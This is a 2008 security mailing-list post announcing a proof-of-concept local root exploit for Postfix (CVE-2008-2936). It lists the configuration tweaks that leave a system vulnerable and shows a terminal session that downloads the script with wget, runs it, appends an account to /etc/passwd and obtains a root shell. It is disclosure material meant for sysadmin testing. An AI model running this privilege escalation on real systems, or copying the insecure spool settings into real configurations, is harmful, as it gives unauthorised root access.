-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

The recent vulnerability in Postfix discovered by Sebastian Krahmer is
trivially exploitable when certain preconditions are met. Nevertheless,
it's very difficult to find such conditions in a real-world scenario. I
wrote this exploit for fun and to demonstrate that. I also hope it helps
sysadmins to check and test their systems.

I used an Ubuntu/Debian (IA32) system which I had to make vulnerable on
purpose. The tweaks were:

• • #1: make the spool writable to attacker
    chmod o+w /var/mail
• • #2: disable mail aliases (LDA should be able to deliver mail directly to
    "root" mailbox)
• • #3: use "local" postfix process as LDA

Perhaps condition #1 is the most difficult to meet, for a normal
(non-privileged) user. But think about a privilege escalation if you manage
to get into the "mail" group first (spool dir is tipically writable by
members of "mail" group).

For #2, it depends on configuration, but Ubuntu/Debian usually creates an
alias for "root", so that mail is delivered to a non-root account (and
making the system non vulnerable to this exploit).

When installing Postfix, you are asked to choose a local delivery agent
(LDA). I found one of my test systems using procmail (not vulnerable) and
another one using postfix built-in LDA (vulnerable).

For a quick test, normally, it will be sufficient to append the following
lines to /etc/postfix/main.cf:
alias_maps =
mailbox_command =
(left blank intentionally)

Finally, postfix should be refreshed:
postfix reload

There are other preconditions like:

• • #4: postfix should not be using maildir-style mailboxes
• • #5: mailbox for "root" should not exist (or at least you should have
    permission to delete it, which is not always possible, even when #1 is true)

My script tries to do its best to check for these conditions (postfix
config is very flexible, I only checked some typical parameters). Feel free
to write me for corrections, etc.

==============

roman@jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh
roman@jupiter:~$ chmod a+x rs_pocfix.sh
roman@jupiter:~$ ./rs_pocfix.sh

"rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)

by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[email protected]>

Tested: Ubuntu / Debian

[ Madrid, 30.Aug.2008 ]

[] Postfix seems to be installed
[] Hardlink to symlink not dereferenced
[] Spool dir is writable
[] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107")
[] Sending mail (3 seconds wait)
[] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass
is "dsrrocks")
roman@jupiter:~$ su dsr
Password:
sh-3.1#

==============

PS: I didn't find Wietse's nice advisory [1] on postfix.org site (or at
least, if it exists, it's not easy to find it). Although it seems that some
non-POSIX issues in OS are contributing to the vulnerability, IMHO it's a
(low-medium risk) vulnerability in Postfix and it deserves to be listed on
postfix page. Despite this issue, Postfix continues being one of the best
mail server software ever made and my favourite MTA.

[1] http://article.gmane.org/gmane.mail.postfix.announce/110

Cheers,

• -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFIunoI5H+KferVZ0IRAkBrAKCwgHV+6O+At5Hw0dsYs8kYJZQjZACeJ96a
Ww7gCuqOt32rA2HhiTuKeRk=
=oo87
-----END PGP SIGNATURE-----